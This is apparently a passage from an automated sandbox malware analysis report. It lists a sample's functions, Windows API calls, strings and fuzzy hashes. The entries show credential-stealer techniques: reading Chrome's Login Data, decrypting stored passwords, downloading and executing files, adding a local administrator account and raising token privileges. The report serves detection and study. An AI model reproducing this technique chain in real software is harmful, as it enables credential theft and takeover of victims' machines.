Instruction Fuzzy Hash: 03315E71D0020A9BCB10EFA5D995AEEBBB9AF44304F10456EE406B7291EB385E84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00413248 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00410DCC,?,?,00000001), ref: 0041329D
LookupAccountSidW.ADVAPI32(00000000,00410DCC,?,00000104,?,00000010,?), ref: 004132C2
GetLastError.KERNEL32(?,?,00000001), ref: 004132CC
FreeSid.ADVAPI32(00410DCC,?,?,00000001), ref: 004132DA

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AccountAllocateErrorFreeInitializeLastLookup
String ID:
API String ID: 1866703397-0
Opcode ID: e12a8646040c27777401d850edb44bb0f307d33b1d83e738ee1268d68efff8c7
Instruction ID: 7cde8fbbb1f436e8716ebfdf5c86cef1e834556c8e0375fc0c194cc399b5966e
Opcode Fuzzy Hash: e12a8646040c27777401d850edb44bb0f307d33b1d83e738ee1268d68efff8c7
Instruction Fuzzy Hash: 6411D7B190021DAADB10DFD5DC89AEEB7BCEB08745F0044BAE605E2150E7749B449BA5

Uniqueness

Uniqueness Score: -1.00%

Function 004105C0 Relevance: 6.0, APIs: 4, Instructions: 49encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004105DF
LocalAlloc.KERNEL32(00000040,00000000,?,00410532,00000000,00000000,?,00000000,00000000,00000000), ref: 004105ED
CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00410603
LocalFree.KERNEL32(00000000,?,00410532,00000000,00000000,?,00000000,00000000,00000000), ref: 00410611

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: 25eb5fa646fe1871fb260f13b8de5efe6d370c954f10145a6f89bb1b52754b22
Instruction ID: 0d900e56e09d744a2b6d1957f72eefe44b9df2b2a6cc93fb5acd30ff62ff266d
Opcode Fuzzy Hash: 25eb5fa646fe1871fb260f13b8de5efe6d370c954f10145a6f89bb1b52754b22
Instruction Fuzzy Hash: 53011975601226BFEB214B5A9C49ED7BFACEF89BA4B100021F909D6250D7B18D50CAF9

Uniqueness

Uniqueness Score: -1.00%

Function 004036EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82filenetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 00413915: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000005,00000000,?,?,?), ref: 00413946

Part of subcall function 004044C4: EntryPoint.DBKYOVYK(0000000A,?,75A901C0,?,?,?,?,?,?,?,?,?,?,00414F10,?,75A901C0), ref: 004044DB

Part of subcall function 004042C5: lstrcatW.KERNEL32(00000000,75A901C0), ref: 004042F5

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Part of subcall function 00404656: lstrcpyW.KERNEL32(00000000,75A901C0), ref: 00404680

Part of subcall function 0040453A: PathFindExtensionW.SHLWAPI(?,?,00403745,?,?,00000000,004194E4), ref: 00404544

URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00403777
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 004037A1

Strings

open, xrefs: 0040379B

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Path$DownloadEntryExecuteExtensionFileFindFolderFreePointShellSpecialVirtuallstrcatlstrcpy
String ID: open
API String ID: 427650655-2758837156
Opcode ID: d92ad0ecfdd1780ed8a34f1cfdf7fa2904212ae5d3139ed5b91d0f439994cfb2
Instruction ID: 1526610c4d6041c847f932df0da928eff78ff96ef7921658faf5c9de6a5e5720
Opcode Fuzzy Hash: d92ad0ecfdd1780ed8a34f1cfdf7fa2904212ae5d3139ed5b91d0f439994cfb2
Instruction Fuzzy Hash: B2216D75A00108BBCB10EF92D895EEE7B38AF81758F00806EF5167B2C1DB385A45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 39D3E0DD Relevance: 5.1, Strings: 4, Instructions: 135COMMON

Download Yara Rule

Strings

%8.8lx, xrefs: 39D3E28C
\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layout\, xrefs: 39D3E12C
IgnoreRemoteKeyboardLayout, xrefs: 39D3E181
@, xrefs: 39D3E16D

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: %8.8lx$@$IgnoreRemoteKeyboardLayout$\Registry\Machine\System\CurrentControlSet\Control\Keyboard Layout\
API String ID: 0-2780503286
Opcode ID: 9bde31431e6b7abd40925342dd1484e8d4a6df95847d6d5e6fe829a452d25f52
Instruction ID: 431379e17dbe5736537a7fed8c13f85f7a0eeca47f31779814a166f6fb4b2c1c
Opcode Fuzzy Hash: 9bde31431e6b7abd40925342dd1484e8d4a6df95847d6d5e6fe829a452d25f52
Instruction Fuzzy Hash: 3E51B279A0135CDFEF10DBA1CC8AB9DBBB9EB48752F804429E405E7191DB349946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040DA6A Relevance: 4.6, APIs: 3, Instructions: 61stringencryptionCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C0000000,?,00000000,00000000,?,0040D187,?,?,encryptedPassword,encryptedUsername,hostname,encryptedUsername,?,?,00000000,C0000000), ref: 0040DA87
CryptStringToBinaryA.CRYPT32(C0000000,00000000,00000001,?,?,00000000,00000000), ref: 0040DAB5

Part of subcall function 00406F2C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0040467B,00417610,?,?,004152FA,00417648,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00417610,?,75A901C0,00000000), ref: 00406F36

lstrcpyA.KERNEL32(00000000,?), ref: 0040DB05

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
String ID:
API String ID: 573875632-0
Opcode ID: 310907dab0c2599d6b34fa35ff059cf309299b7f094d0d77dce76a50124e9a8c
Instruction ID: 8409be6b82d186b979adee838c9faa2c62975ddb3d80ec53927bdf5a725c74f4
Opcode Fuzzy Hash: 310907dab0c2599d6b34fa35ff059cf309299b7f094d0d77dce76a50124e9a8c
Instruction Fuzzy Hash: A711D8B5D0011DAFDB00DF95D8849EEBBB8EB48344F1080BAF505E3250D7355E45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004132F4 Relevance: 4.6, APIs: 3, Instructions: 58COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(00000000,00000028,?,74DF0F00,00000000), ref: 0041331F
LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 00413330
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000010,?,?), ref: 00413366

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
String ID:
API String ID: 658607936-0
Opcode ID: a87d41f1bc937aa042f5995c51213534544f9de14b98fd956cbf222a85f555f1
Instruction ID: d3ea9aace96fe3ca4c646ea5ba729469b27456ed29c20de5198f6b271330a057
Opcode Fuzzy Hash: a87d41f1bc937aa042f5995c51213534544f9de14b98fd956cbf222a85f555f1
Instruction Fuzzy Hash: 43112A75A1021DBFEB10CFA4CC849EFFBBCFB48340F10462AE911F2250E7749A448A65

Uniqueness

Uniqueness Score: -1.00%

Function 00410468 Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 00410490
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00410441,?,00000000,?,?,00000005,?,004103B0), ref: 004104A7
LocalFree.KERNEL32(00410441,?,?,?,?,?,00410441,?,00000000,?,?,00000005,?,004103B0), ref: 004104C7

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: c5170f8bab47c48552d215b7de6175cb71e1c557c96f642fcd139cf39b21a582
Instruction ID: ef3efbcf410f6c88104050a3c7dba8870e78a8c3422621c0a01226a2ea3d0f3f
Opcode Fuzzy Hash: c5170f8bab47c48552d215b7de6175cb71e1c557c96f642fcd139cf39b21a582
Instruction Fuzzy Hash: FA010CB9900209AFDB059FA4DC168EFBBB9EB48310B10416AED55A2350E7759A448AA4

Uniqueness

Uniqueness Score: -1.00%

Function 39CED3C2 Relevance: 3.8, Strings: 3, Instructions: 51COMMON

Download Yara Rule

Strings

EnablePerProcessSystemDPIForProcesses, xrefs: 39CED409
PerProcessSystemDpi, xrefs: 39CED3CC
DisablePerProcessSystemDPIForProcesses, xrefs: 39CED3F7

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: DisablePerProcessSystemDPIForProcesses$EnablePerProcessSystemDPIForProcesses$PerProcessSystemDpi
API String ID: 0-127863980
Opcode ID: bc01368e6c919581e939b1e1b797bf2344aa7ee2d61ce514d3b6d69d7ce7ed60
Instruction ID: c5c13559564f539d9d45399289a75c8c163124e4c8ce1cc57ceebc6cc4104e54
Opcode Fuzzy Hash: bc01368e6c919581e939b1e1b797bf2344aa7ee2d61ce514d3b6d69d7ce7ed60
Instruction Fuzzy Hash: B8112B36611A80CFD306DB01D565BED33E9BB88780F4545B6D8068BB56D774AA40CA91

Uniqueness

Uniqueness Score: -1.00%

Function 00410D7A Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

NetUserAdd.NETAPI32(00000000,00000001,?,00000000,76ECE820,?,?,?,?,?,004122D6,005530AC,005530B0), ref: 00410DB5

Part of subcall function 00413248: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00410DCC,?,?,00000001), ref: 0041329D
Part of subcall function 00413248: LookupAccountSidW.ADVAPI32(00000000,00410DCC,?,00000104,?,00000010,?), ref: 004132C2
Part of subcall function 00413248: GetLastError.KERNEL32(?,?,00000001), ref: 004132CC
Part of subcall function 00413248: FreeSid.ADVAPI32(00410DCC,?,?,00000001), ref: 004132DA

NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,004122D6,005530AC,005530B0), ref: 00410DD6

Part of subcall function 00406F1D: VirtualFree.KERNELBASE(?,00000000,00008000,00406CE1,00000000,?,00414EA7,?,?,00417742), ref: 00406F25

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
String ID:
API String ID: 188019324-0
Opcode ID: e58be45e854d5dc16f3ca436cd3ce333505794b262aefcc98902a433a8c9c40f
Instruction ID: a4129e04df81c12239e9f79046a0ab8cac125e47b0fdc5c5e1b94ecf136bb6d5
Opcode Fuzzy Hash: e58be45e854d5dc16f3ca436cd3ce333505794b262aefcc98902a433a8c9c40f
Instruction Fuzzy Hash: EA110C75900209AFCB00DFAAD8848EEFBF8FF58754B10846BE815E7210D7B49A418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00415CC4 Relevance: 2.6, Strings: 2, Instructions: 74COMMON

Download Yara Rule

Strings

\Google\Chrome\User Data\Default\Login Data, xrefs: 00415CF9, 00415D03, 00415D20, 00415D21
Default, xrefs: 00415CFE

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID:
String ID: Default$\Google\Chrome\User Data\Default\Login Data
API String ID: 0-2366283731
Opcode ID: b659ba5c9789280f7faab8fadcc781f0572d39af879d2270f0eea7706f71616b
Instruction ID: 8411161f8739c691c16b18b3d077228f622b3d6545b4b7d4e11ac18680942479
Opcode Fuzzy Hash: b659ba5c9789280f7faab8fadcc781f0572d39af879d2270f0eea7706f71616b
Instruction Fuzzy Hash: 41110A76B00104ABCB24DFADDC46EEF7769DF84314B14416EF505A7281EA35AA11C798

Uniqueness

Uniqueness Score: -1.00%

Function 39D403AB Relevance: 2.6, Strings: 2, Instructions: 56COMMON

Download Yara Rule

Strings

Preload, xrefs: 39D40418
keyboardlayout.ini, xrefs: 39D40407

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: Preload$keyboardlayout.ini
API String ID: 0-2089704940
Opcode ID: d5354914f15f889cddfb4aaf873f5ce06515c6734b227eada0e06bbf3a41075e
Instruction ID: e9f54a1ad6a38dd65864ae604dfb8200e5b4885e6add9b8e061f92199faf7603
Opcode Fuzzy Hash: d5354914f15f889cddfb4aaf873f5ce06515c6734b227eada0e06bbf3a41075e
Instruction Fuzzy Hash: 9011E570940258EBDB15EBA4EC4BFED7778EB08750F808565E906BA8C0DF746941CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 39CF0B80 Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

RESU, xrefs: 39CF0B89

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: RESU
API String ID: 0-3162963186
Opcode ID: 54f2c6654b171394f40c3854057e4732d0eb97817280e065dbf878009ab3a0bf
Instruction ID: 4c166d954adaabd252fb5d3ce9dc000bf6c47d882e7f0430ccffeb8c72a0e384
Opcode Fuzzy Hash: 54f2c6654b171394f40c3854057e4732d0eb97817280e065dbf878009ab3a0bf
Instruction Fuzzy Hash: 0BC02BB010028DFF8B00CF42C40FC0EFF7CD7803547008014B50A12100CAB0DA02DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 39CF0AE0 Relevance: 1.3, Strings: 1, Instructions: 9COMMON

Download Yara Rule

Strings

RESU, xrefs: 39CF0AE9

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID: RESU
API String ID: 0-3162963186
Opcode ID: a0954e0eff23ce75eeb3d95c1d4c296dcbd291461781b8b8ae2ba2c12a2178c9
Instruction ID: 6bdc083accd9815a6e352170a4b057635ce5c4dbbb18aa34d02382d4b38a0ef7
Opcode Fuzzy Hash: a0954e0eff23ce75eeb3d95c1d4c296dcbd291461781b8b8ae2ba2c12a2178c9
Instruction Fuzzy Hash: DCC02BB000024DFF8B00CF42C40FC0EFFBCD7803547018014B51612110CBB0DA42DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 39CD7D00 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db05bedf3be8baed216d8ec635a940fdf4162be8909a9913b1f43fa88e7e582
Instruction ID: e8dca7df6e180fb4d3880b244b168bef1bbb5e7a3595751455751fdf9ba81352
Opcode Fuzzy Hash: 2db05bedf3be8baed216d8ec635a940fdf4162be8909a9913b1f43fa88e7e582
Instruction Fuzzy Hash: D6D1A4B8D00749EFEF518FA5D8599AEBB75FF48780F508026E902F3250DB329941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 39CE3130 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a0413ca57cbc62f76f3e44df22b439ca96366aa044a33a00b10780b9767c75
Instruction ID: 606f0313c2e4cb42148a06f7df9c498898ad2cd97402e5aa7b6c19da79e3a3fb
Opcode Fuzzy Hash: 43a0413ca57cbc62f76f3e44df22b439ca96366aa044a33a00b10780b9767c75
Instruction Fuzzy Hash: D5A12932F04B818BEB12CE39E482A6E33D6BF85382F456A29E543DB144DE75F505C792

Uniqueness

Uniqueness Score: -1.00%

Function 39CD7E50 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5539032905207207f6b2021bbc436435d16671f420bd97c5c7ef39f33d212ab
Instruction ID: 6ced6e38cd796b695cd921ad09fac97fba09cdf567bb185e80fb3ddeddf0f6ac
Opcode Fuzzy Hash: f5539032905207207f6b2021bbc436435d16671f420bd97c5c7ef39f33d212ab
Instruction Fuzzy Hash: A161D4B4900345DFDB619F7AE94965E7FB8FF48781F408429E646E7210CB31DA42CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 39D3D395 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 489eea10c14a5a1267b629b72f654e3fff704e34182c811615c92273f71b10da
Instruction ID: 2adf34d4f4f5c2d5d13217a60060c055108178d2b1564a3b704e0c566e074a5d
Opcode Fuzzy Hash: 489eea10c14a5a1267b629b72f654e3fff704e34182c811615c92273f71b10da
Instruction Fuzzy Hash: E47157B2509345DFC311CF64C885A9BBBE8BF88785F80492EF59993650DB70E605CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 39D30146 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7b9bd3c055fe47740245244ee0684dd894d3d275d3ea5e227d1a5659bff3f4d
Instruction ID: befdabab26238d0a9bff977cc01d4c449886625ddcefb76d0d93c1c824ed484b
Opcode Fuzzy Hash: f7b9bd3c055fe47740245244ee0684dd894d3d275d3ea5e227d1a5659bff3f4d
Instruction Fuzzy Hash: EB517075E0124DAFDB00CFA5D886AEEB7BDEB08351F40852AE941E7540D734A906CB60

Uniqueness

Uniqueness Score: -1.00%

Function 39D3CE14 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bdabf501be291198ef13fa061fdff7a860d8cfe5eafd8a85ddcc0b29318ac83
Instruction ID: f564739d13668fa0e7ba7316316bd204ab24a2c4255bde3821ca30988fcf5826
Opcode Fuzzy Hash: 8bdabf501be291198ef13fa061fdff7a860d8cfe5eafd8a85ddcc0b29318ac83
Instruction Fuzzy Hash: 9541C175A06254EBDB04DF78CC82FAABBB5FF08346F408055ED45A7691CB34A906CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 39D3C106 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 505fb80e1d2cbda69a3115d8caa6096ec39912e0bf426a53ba8c08c69d25af7b
Instruction ID: 5fd68717c49e03400b92cccbdf4c879063241392cead6d5dc12678ea8aebf5d3
Opcode Fuzzy Hash: 505fb80e1d2cbda69a3115d8caa6096ec39912e0bf426a53ba8c08c69d25af7b
Instruction Fuzzy Hash: 20418579A02254EBDB00DFA5CC86FAABB75FF45355F808055EC45A7691CB34A902CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041E172 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2878947374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.2878947374.0000000000552000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.2878947374.0000000000554000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_dbkyovyK.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
Instruction ID: 9558bf02ccf66081fcb2d20b35a270822fb4d998585885982319bc9259473db7
Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
Instruction Fuzzy Hash: 72316179E0061AAFDB14CF99C8D09AEF7F5FF49314B1981AAD801A7711D734E981CB84

Uniqueness

Uniqueness Score: -1.00%

Function 39D3B9B6 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84ea839222db7ac41f09200743e9bfca0e96baec8ab7bc23dc08d1a7c47b5073
Instruction ID: d5abd49078e8a9d9123fcb9cc4445e3e394062f6b608d633c97ba1cd2b614af2
Opcode Fuzzy Hash: 84ea839222db7ac41f09200743e9bfca0e96baec8ab7bc23dc08d1a7c47b5073
Instruction Fuzzy Hash: E5316F3580254EEFCB02DF95C896EBDBB75FB88702B948129E40277560DB35A943CF60

Uniqueness

Uniqueness Score: -1.00%

Function 39D3CA10 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86cd2be53caf1d0a454fb54452329d959fabdd078357d78b1e993cc389946c9f
Instruction ID: 7839fbb1f2ddc059f8dcf8eb232bf5b663caf12fcf7dc4b1ad595b5985bf15b7
Opcode Fuzzy Hash: 86cd2be53caf1d0a454fb54452329d959fabdd078357d78b1e993cc389946c9f
Instruction Fuzzy Hash: 3C31A475602244DFCB12DFA4C986FADB7B5FF08342F904459E901769A0C775A946CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 39D3BADF Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88395342318e4e198cb2cfb2cd199e7f339e436cac1e08709bc773986bf799f2
Instruction ID: 70623fff4df9e2a065837634e114474f5f0b91c400b6831f8fdbc8a5f4328710
Opcode Fuzzy Hash: 88395342318e4e198cb2cfb2cd199e7f339e436cac1e08709bc773986bf799f2
Instruction Fuzzy Hash: 7F316B71601A06AFD309CF19C892A26FBE5FB88750B40CA2AE41997A55CB34F961CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 39D3CC01 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ac63124fac719da1421c6c07b3bd506499673e820fb6a02285adf71db97a214
Instruction ID: b47b09f9caa36db1c01ebe72e95977752a98ed2b8525f4097da2cab03206ee6d
Opcode Fuzzy Hash: 3ac63124fac719da1421c6c07b3bd506499673e820fb6a02285adf71db97a214
Instruction Fuzzy Hash: 6F21847AA01254EBDB119FB5C986FEEBBB8EF14742F508015F905B76A0C730A941CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 39D3BEB3 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2908080372.0000000039CB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 39CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_39cb0000_dbkyovyK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a979bbaebc897a1b1216ef6414ba903c4b9985fe213b639caf650fb02d8c5e8d
Instruction ID: 49518a4b722171c135a3d1a90b46138d25be120a21c29620bd23bc0b23b3f694
